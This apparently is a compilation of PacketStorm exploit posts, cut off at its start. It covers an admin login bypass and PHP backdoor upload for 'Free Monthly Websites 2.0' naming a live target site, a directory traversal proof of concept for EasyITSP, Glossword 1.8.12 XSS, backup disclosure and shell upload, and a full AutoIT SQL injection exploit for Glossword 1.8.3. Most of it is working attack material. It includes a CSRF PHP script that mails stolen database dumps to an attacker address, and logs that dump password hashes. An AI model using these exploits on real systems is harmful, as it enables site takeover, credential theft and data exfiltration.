$_SESSION[logged_in]=true; 30 header("location:welcome.php"); Based at line 16 we know that Admin Username and Password store in admin_settings.txt NOT on Database! So When we login into Admin Panel, file_io.php will Read Valid Username and Password from admin_settings.txt If you do a direct access to the file admin_settings.txt, The results is 403 Permission Denied You do not have permission for this request /admin/settings/admin_settings.txt Pic : http://i48.tinypic.com/2gvlwt4.png So... How to Bypass Admin Login Page? 1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php Live Target : http://www.massmoneywebsites.com/admin/ 2nd. Inspect Element on the login Form. Pic : http://i47.tinypic.com/2r5ddp1.png 3rd. Change from <form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form> <input type="hidden" name="do_type" value="admin_settings_read"> CHANGE TO <form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form> <input type="text" name="do_type" value="admin_settings_write"> Then press ENTER (please see pic). Pic : http://i49.tinypic.com/351z3ib.png 4th. You will see A Login Failed Page : >> You need to login in to access that page << Pic : http://i50.tinypic.com/33ws8jb.png Never Mind About that, just click 'Login Button' and VOILA you get and Admin Access! pic : http://i45.tinypic.com/jzwpea.png ---------------------------------------- [ 2 ] Upload PHP Backdoor or PHP Shell This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0 So... How to Upload Backdoor (PHP Shell)? 1st. Go to Add/Remove Navigation Page. http://target.com/[path]/admin/add_main_pages.php Live Target : http://www.massmoneywebsites.com/admin/add_main_pages.php 2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php And click Add New Navigation Page. Pic : http://i45.tinypic.com/vigzsp.png 3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links. Pic : http://i46.tinypic.com/1040oxg.png Change FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages. Pic : http://i49.tinypic.com/24ec1l0.jpg 4th. Go to Edit Navigation Page. http://www.massmoneywebsites.com/admin/edit_main_pages.php Please Select a Page To Edit: dwi.php.html <--- Select that page. 5th. Inspect element on dwi.php.html Pic : http://i50.tinypic.com/29pq1ix.png Change FROM <option value="dwi.php.html" selected="">dwi.php.html</option> To <option value="dwi.php" selected="">dwi.php</option> Pic : http://i47.tinypic.com/wtb0j6.png 6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php URL For This Page: main_pages/dwi.php Use the 'URL For This Page' field above: [Tick] Display This Page in Left Vertical Site Navigation: [Tick] Display This Page in Top Horizontal Site Navigation Buttons: [Tick] Pic : http://i46.tinypic.com/1zebnle.png 7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page: Click SOURCE button Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below. And Press Enter Twice at the Last Line. *Please see 2 Pictures below If you dunno Understand Pic 1 : http://i49.tinypic.com/1zlzxq0.png Pic 2 : http://i48.tinypic.com/291kc9h.png If you wanna do this, please Remove Your Backdoor Password. Click Save Edited Navigation Page. 8th. After this message >> Data saved successfully << Appeared, Visit the Home Page and you will see the Backdoor Page Pic : http://i49.tinypic.com/4rt1g4.png //I'm sorry My English was poor Source: PacketStorm

EasyITSP versions 2.0.7 and below suffer from a directory traversal vulnerability. Directory Traversal - EasyITSP <= 2.0.7 EasyITSP - Telephone System VoIP http://blaszczakm.blogspot.com Michal Blaszczak Search/Read/Delete filetype *.txt Search/Play/Delete filetype *.wav - Voicemail file: voicemail.php line: 220 foreach (glob("$vmdir/$_SESSION[phone]/$vmfolder/*.txt") as $filename) { file: voicemail.php line: 186 - 190 if(isset($_GET['folder'])) { $vmfolder = $_GET['folder']; } else { $vmfolder = "INBOX"; } POC: http:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../ Micha? B?aszczak http://blaszczakm.blogspot.com Source: PacketStorm

Glossword version 1.8.12 suffers from database backup disclosure, cross site request forgery, cross site scripting, and remote shell upload vulnerabilities. =================================================== Vulnerable Software: Glossword 1.8.12 Tested version: Glossword 1.8.12 Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.12/ Vulns: XSS && Database Backup Disclosure && CSRF && Shell upload. Dork: Powered by Glossword 1.8.12 =================================================== Tested On: Debian squeeze 6.0.6 Server version: Apache/2.2.16 (Debian) Apache traffic server 3.2.0 MYSQL: 5.1.66-0+squeeze1 PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH =================================================== About vulns: XSS http://hacker1.own/glosslatest/glossword/1.8/gw_admin.php?a="><script>alert(1);</script>&t=settings =================================================== Database Backup disclosure: root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# grep 'umask' /etc/pam.d/common-session session optional pam_umask.so umask=0067 root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# umask -S u=rwx,g=x,o= # NOTE 1: Notice database backups chmod'ed to 777 by script# # NOTICE 2: BELOW database backups is accessible via HTTP REQUESTS # root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# ls -liash total 1.1M 65345 4.0K drwxrwxrwx 2 hacker1user hacker1user 4.0K Feb 3 08:41 . 60499 4.0K drwxr-xr-x 3 hacker1user hacker1user 4.0K Feb 3 08:40 .. 65347 68K -rwxrwxrwx 1 hacker1user hacker1user 64K Feb 3 08:40 backup_gwnew_abbr_phrase.sql 65346 12K -rwxrwxrwx 1 hacker1user hacker1user 9.8K Feb 3 08:40 backup_gwnew_abbr.sql 65367 4.0K -rwxrwxrwx 1 hacker1user hacker1user 402 Feb 3 08:40 backup_gwnew_auth_restore.sql 65359 4.0K -rwxrwxrwx 1 hacker1user hacker1user 304 Feb 3 08:40 backup_gwnew_captcha.sql 65350 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.3K Feb 3 08:40 backup_gwnew_component_actions.sql 65349 8.0K -rwxrwxrwx 1 hacker1user hacker1user 6.2K Feb 3 08:40 backup_gwnew_component_map.sql 65348 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.7K Feb 3 08:40 backup_gwnew_component.sql 65365 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:40 backup_gwnew_custom_az_profiles.sql 65364 36K -rwxrwxrwx 1 hacker1user hacker1user 33K Feb 3 08:40 backup_gwnew_custom_az.sql 65368 240K -rwxrwxrwx 1 hacker1user hacker1user 234K Feb 3 08:41 backup_gwnew_dict_example.sql 65351 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.6K Feb 3 08:40 backup_gwnew_dict.sql 65374 268K -rwxrwxrwx 1 hacker1user hacker1user 263K Feb 3 08:41 backup_gwnew_history_terms.sql 65363 4.0K -rwxrwxrwx 1 hacker1user hacker1user 2.6K Feb 3 08:40 backup_gwnew_import_sessions.sql 65369 4.0K -rwxrwxrwx 1 hacker1user hacker1user 326 Feb 3 08:41 backup_gwnew_map_user_to_dict.sql 65370 24K -rwxrwxrwx 1 hacker1user hacker1user 23K Feb 3 08:41 backup_gwnew_map_user_to_term.sql 65353 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.3K Feb 3 08:40 backup_gwnew_pages_phrase.sql 65352 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.1K Feb 3 08:40 backup_gwnew_pages.sql 65354 4.0K -rwxrwxrwx 1 hacker1user hacker1user 485 Feb 3 08:40 backup_gwnew_search_results.sql 65355 4.0K -rwxrwxrwx 1 hacker1user hacker1user 538 Feb 3 08:40 backup_gwnew_sessions.sql 65356 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.2K Feb 3 08:40 backup_gwnew_settings.sql 65357 4.0K -rwxrwxrwx 1 hacker1user hacker1user 321 Feb 3 08:40 backup_gwnew_stat_dict.sql 65358 4.0K -rwxrwxrwx 1 hacker1user hacker1user 599 Feb 3 08:40 backup_gwnew_stat_search.sql 65373 8.0K -rwxrwxrwx 1 hacker1user hacker1user 8.0K Feb 3 08:41 backup_gwnew_theme_group.sql 65371 260K -rwxrwxrwx 1 hacker1user hacker1user 256K Feb 3 08:41 backup_gwnew_theme_settings.sql 65372 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:41 backup_gwnew_theme.sql 65361 4.0K -rwxrwxrwx 1 hacker1user hacker1user 908 Feb 3 08:40 backup_gwnew_topics_phrase.sql 65360 4.0K -rwxrwxrwx 1 hacker1user hacker1user 761 Feb 3 08:40 backup_gwnew_topics.sql 65362 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.2K Feb 3 08:40 backup_gwnew_users.sql 65366 4.0K -rwxrwxrwx 1 hacker1user hacker1user 949 Feb 3 08:40 backup_gwnew_virtual_keyboard.sql 65375 32K -rwxrwxrwx 1 hacker1user hacker1user 29K Feb 3 09:03 backup_gwnew_wordlist.sql 65376 48K -rwxrwxrwx 1 hacker1user hacker1user 46K Feb 3 08:41 backup_gwnew_wordmap.sql root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# cd /tmp root@debian:/tmp# wget --user-agent="BACKUP DISCLOSURE EXAMPLE" http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql && cat backup_gwnew_users.sql --2013-02-03 09:13:17-- http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql Resolving hacker1.own... 127.0.0.1 Connecting to hacker1.own|127.0.0.1|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3184 (3.1K) [text/plain] Saving to: “backup_gwnew_users.sql” 100%[======================================================================================>] 3,184 --.-K/s in 0s 2013-02-03 09:13:17 (13.7 MB/s) - “backup_gwnew_users.sql” saved [3184/3184] SET NAMES 'utf8'; DROP TABLE IF EXISTS `gwnew_users`; CREATE TABLE `gwnew_users` ( `id_user` int(10) unsigned NOT NULL AUTO_INCREMENT, `login` varbinary(128) NOT NULL, `password` char(32) NOT NULL, `is_active` tinyint(1) unsigned NOT NULL DEFAULT '1', `is_multiple` tinyint(1) unsigned NOT NULL DEFAULT '0', `is_show_contact` tinyint(1) unsigned NOT NULL DEFAULT '1', `date_reg` int(10) unsigned NOT NULL DEFAULT '0', `date_login` int(10) unsigned NOT NULL DEFAULT '0', `int_items` int(10) unsigned NOT NULL DEFAULT '0', `user_fname` varbinary(64) NOT NULL, `user_sname` varbinary(64) NOT NULL, `user_email` varchar(255) NOT NULL, `user_perm` blob NOT NULL, `user_settings` blob NOT NULL, PRIMARY KEY (`id_user`) ) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; INSERT INTO `gwnew_users` VALUES ('1','guest','084e0343a0486ff05530df6c705c8bb4','1','0','0','0','1359897241','1','Guest','','guest@localhost.tld','a:0:{}',0x613a343a7b733a363a226c6f63616c65223b733a333a22656e67223b733a383a226c6f636174696f6e223b733a303a22223b733a31303a22676d745f6f6666736574223b733a313a2230223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d); INSERT INTO `gwnew_users` VALUES ('2','admin','01a8e7efac66ec52b417af55940e4719','1','0','1','1359915020','1359898817','23','Admin User',' ','admin@hacker1.own','a:16:{s:8:\"IS-EMAIL\";i:1;s:8:\"IS-LOGIN\";i:1;s:11:\"IS-PASSWORD\";i:1;s:8:\"IS-USERS\";i:1;s:13:\"IS-TOPICS-OWN\";i:1;s:9:\"IS-TOPICS\";i:1;s:12:\"IS-DICTS-OWN\";i:1;s:8:\"IS-DICTS\";i:1;s:12:\"IS-TERMS-OWN\";i:1;s:8:\"IS-TERMS\";i:1;s:15:\"IS-TERMS-IMPORT\";i:1;s:15:\"IS-TERMS-EXPORT\";i:1;s:13:\"IS-CPAGES-OWN\";i:1;s:9:\"IS-CPAGES\";i:1;s:15:\"IS-SYS-SETTINGS\";i:1;s:10:\"IS-SYS-MNT\";i:1;}',0x613a31393a7b733a31303a226176617461725f696d67223b733a31373a22313335393839373436315f73312e706870223b733a31323a226176617461725f696d675f79223b4e3b733a31323a226176617461725f696d675f78223b4e3b733a31303a22676d745f6f6666736574223b733a313a2233223b733a393a2269735f68746d6c6564223b733a313a2231223b733a31333a2269735f7573655f617661746172223b693a303b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a383a226c6f636174696f6e223b733a303a22223b733a31313a2276697375616c7468656d65223b733a393a2267775f73696c766572223b733a31323a2264696374696f6e6172696573223b613a303a7b7d733a363a2269735f647374223b693a303b733a31313a22646174655f666f726d6174223b733a31333a2246206a2c20592c20673a692061223b733a31333a22696d706f72745f666f726d6174223b733a333a22637376223b733a32313a22696d706f72745f69735f636865636b5f6578697374223b693a303b733a31393a22696d706f72745f69735f6f7665727772697465223b693a303b733a32323a22696d706f72745f69735f7370656369616c6368617273223b693a303b733a32303a22696d706f72745f69735f77686974657370616365223b693a303b733a32313a22696d706f72745f69735f636f6e766572745f657363223b693a303b733a32303a22696d706f72745f69735f726561645f6669727374223b693a303b7d); INSERT INTO `gwnew_users` VALUES ('3','test','098f6bcd4621d373cade4e832627b4f6','1','0','1','1359898749','0','0','','','','a:0:{}',0x613a333a7b733a383a226c6f636174696f6e223b733a303a22223b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);root@debian:/tmp# In this example: backup_gwnew_users.sql gwnew_ is my custom table prefix.In fact while installing script it is = gw_ Feel free to create your own bruteforcer: Format is: sql_backup_2013-02Feb-03/backup_{TABLE_PREFIX}_users.sql Also table prefix is not panacea ANYMORE. If Directory index is not forbidden on remote site/server you can see whole : site.tld/gw_export/sql_backup_2013-02Feb-03/ directory structure and you can download it in that way. Ok this is not end. Theris another vector of exploitation using CSRF vulnerability. Here we go (CSRF+database dump stealer) Simply trick the logged in admin to visit malicious page. If the attack successfull it will silenty @mail to you victim's database. ==============EXPLOIT BEGINS===================== <?php error_reporting(0); //echo '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d'); /* http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/ */ //exit; define("TARGETSITE",'http://hacker1.own/glosslatest/glossword/1.8/'); define("HACKERMAIL",'hacker@g00glemail.tld'); define("STANDARDTABLEPREFIX",'gw_'); header('Status: 404 Not found!'); echo '<h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . str_repeat(PHP_EOL,500); for($i=1;$i<8;$i++) { echo '<img src="' . TARGETSITE . '/gw_admin.php?a=maintenance&t=settings&w1=8&w2=' . $i . '&w3=" heigth="0" width="0" />' .PHP_EOL; } $data=TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql'; //echo TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';exit; //@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . TARGETSITE . /gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . $s=file_get_contents($data); /*uncomment if you want to save on your server # file_put_contents(md5(rand(1,1000)) . '.txt',$s);*/ @mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . htmlspecialchars($data) . PHP_EOL . htmlspecialchars($s) .PHP_EOL); exit; ?> ================EXPLOIT ENDS HERE====================== Ok now about shell upload vulnerability (requires administrative access to site) After gain access to admin panel (in eg via XSS or using backup disclosure) Go to: http://site.tld/gw_admin.php?a=edit-own&t=users Upload your shell using: Avatar settings tab. Don't bother about: (*The following file types are allowed: jpg, png*) because it is wrong information. Trace it like this,access it and travel xD http://s006.radikal.ru/i215/1302/27/d4b52ad33b39.png Backup image: http://oi47.tinypic.com/crsde.jpg ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep Source: PacketStorm

Glossword version 1.8.3 remote SQL injection exploit written in AutoIT. #cs ============================================================== Vulnerable Software: Glossword 1.8.3 Official site: http://sourceforge.net/projects/glossword/ Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.3/ Vuln: SQLi ==================THIS IS A WHOLE EXPLOIT===================== Exploit Coded In AutoIT. To exploit this vulnerability magic_quotes_gpc must be turned off on server side. Print screen: http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.png POC video: http://youtu.be/55IaNTQS3Fk Exploit usage: C:\0day>glossa.exe http://hacker1.own /glossword/glossword/ 2 ############################################################## # Glossword 1.8.3 SQL injection Exploit # # Usage: glossa.exe http://site.tld /installdir/ UID (int) # # DON'T HATE THE HACKER, HATE YOUR OWN CODE! # # VULN/Exploit: AkaStep & HERO_AZE # ############################################################## ############################################################## [*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*] ############################################################## ############################################################## [*] CMS is GLOSSWORD! [*] ############################################################## ############################################################## [*] FETCHING VALID SESSUID [*] ############################################################## ############################################################## [*] Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03 [*] ############################################################## ############################################################## [*] !~ P*W*N*E*D ~! [*] -------------------------------------------------------------- [*] Login: admin [*] -------------------------------------------------------------- [*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d [*] -------------------------------------------------------------- Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php -------------------------------------------------------------- [*] Good Luck;) [*] ############################################################## [*] DONE [*] ############################################################## #ce #NoTrayIcon #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Outfile=glossa.exe #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include "WinHttp.au3" #include <inet.au3> #include <String.au3> $triptrop=@CRLF & _StringRepeat('#',62) & @CRLF; $exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _ '#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF & _ '# Usage: ' & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int) #' & _ @CRLF & "# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #" & @CRLF & _ '# VULN/Exploit: AkaStep & HERO_AZE #' & @CRLF & _StringRepeat('#',62); ConsoleWrite(@CRLF & $exploitname & @CRLF) $method='POST'; $vulnurl='gw_admin/login.php' Global $sessid=0 $cmsindent='lossword'; # We will use it to identify CMS #; $adminpanel=$vulnurl ;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE.# ~; $useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)'; $msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int)' & @CRLF if $CmdLine[0] <> 3 Then ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); MsgBox(64,"",$msg_usage); exit; EndIf if $CmdLine[0]=3 Then $targetsite=$CmdLine[1]; $installdir=$CmdLine[2]; $uidtoattack=Number(StringMid($CmdLine[3],1,255)); EndIf if not StringIsDigit($uidtoattack) Then ConsoleWrite(' UID is wrong! Exit' ); Exit; EndIf if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then ConsoleWrite('Are you kidding meeeeen?'); Exit; EndIf HttpSetUserAgent($useragent) $doublecheck=InetGet($targetsite,'',1); if @error Then ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF) Exit; EndIf sleep(Random(1200,2500,1)); sendfakeretrivevalidsess($targetsite,$installdir) HttpSetUserAgent($useragent); $sidentify=_INetGetSource($targetsite & $adminpanel,True); Func exploit($targetsite,$installdir,$sessid) Global $sAddress = $targetsite Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _ "concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _ "gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _ " AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password"; Global $sDomain = $targetsite Global $sPage = $installdir & $vulnurl Global $sAdditionalData = $PAYLOADTOSEND Global $hOpen = _WinHttpOpen($useragent) Global $hConnect = _WinHttpConnect($hOpen, $sDomain) Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '') _WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData) _WinHttpReceiveResponse($hRequest) Global $sReturned If _WinHttpQueryDataAvailable($hRequest) Then Do $sReturned &= _WinHttpReadData($hRequest) Until @error if StringInStr($sReturned,'<sikdir>') and StringInStr($sReturned,'</sikdir>') Then $zsuxxv = StringRegExp($sReturned, '<(?i)sikdir>(.*?)</(?i)sikdir>', 1) For $x = 0 To UBound($zsuxxv) - 1 Beep(100,1000); ConsoleWrite($triptrop & '[*] !~ P*W*N*E*D ~! [*] ' & _ StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _ _StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _ StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _ ' [*] ' & _ StringReplace($triptrop,'#','-') & _ 'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _ '[*] Good Luck;) [*]' & _ $triptrop & '[*] DONE [*]' & _ $triptrop); Next Else ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & ' NO SUCH UID! ' & _StringRepeat(' ',18) & _ ' [*]' & $triptrop); Beep(1500,1000); Exit EndIf EndIf _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) EndFunc;=> exploit(); Func sendfakeretrivevalidsess($targetsite,$installdir) $fakesessionID=''; Do $fakesessionID&=Chr(Random(97,102,1)) & Random(0,9,1) until StringLen($fakesessionID)=32 $fakesessionID=StringMid($fakesessionID,Random(1,32,1),1) & StringMid($fakesessionID,1,StringLen($fakesessionID)-1) ConsoleWrite($triptrop & '[*] SENDING FAKE SESSUID: ' & $fakesessionID & ' [*] ' & $triptrop) sleep(Random(1000,2500,1)) $rtarget=$targetsite & $installdir &"gw_admin/login.php?visualtheme=gw_admin&sid=" &$fakesessionID; HttpSetUserAgent($useragent); $str=_INetGetSource($rtarget); if StringInStr($str,"Session does not exist.") then ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',18) & 'CMS is GLOSSWORD! ' & _StringRepeat(' ',19) & '[*]' & $triptrop); sleep(Random(1000,2500,1)) Else ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',11) &'NOPE:( THIS IS NOT GLOSSWORD CMS.' &_StringRepeat(' ',12) &'[*]' & $triptrop); exit; EndIf $i=123 $mystr=''; ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',16) & 'FETCHING VALID SESSUID' & _StringRepeat(' ',17) & ' [*]' & $triptrop) sleep(Random(1000,2500,1)) Do $i+=1; if $i>=4000 then ExitLoop;//Just for make sure we are not going to infinitive loop if there any error occurs.// $mystr&=StringMid($str,$i,1) until StringInStr($mystr,chr(34)); $sessid=StringMid($mystr,StringInStr($mystr,Chr(61))+1,32) if not $sessid =32 Then ConsoleWrite($triptrop & '[*] Sorry Man! Theris an error while fetching new VALID SESSUID [*]' & $triptrop) exit; Else ConsoleWrite($triptrop & '[*] Got VALID SESSUID: ' & $sessid & ' [*]' & $triptrop) EndIf $targetsite=StringReplace(StringReplace($targetsite,'http://',''),'/','') exploit($targetsite,$installdir,$sessid) EndFunc;=>sendfakeretrivevalidsess(); #cs ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep #ce Source: PacketStorm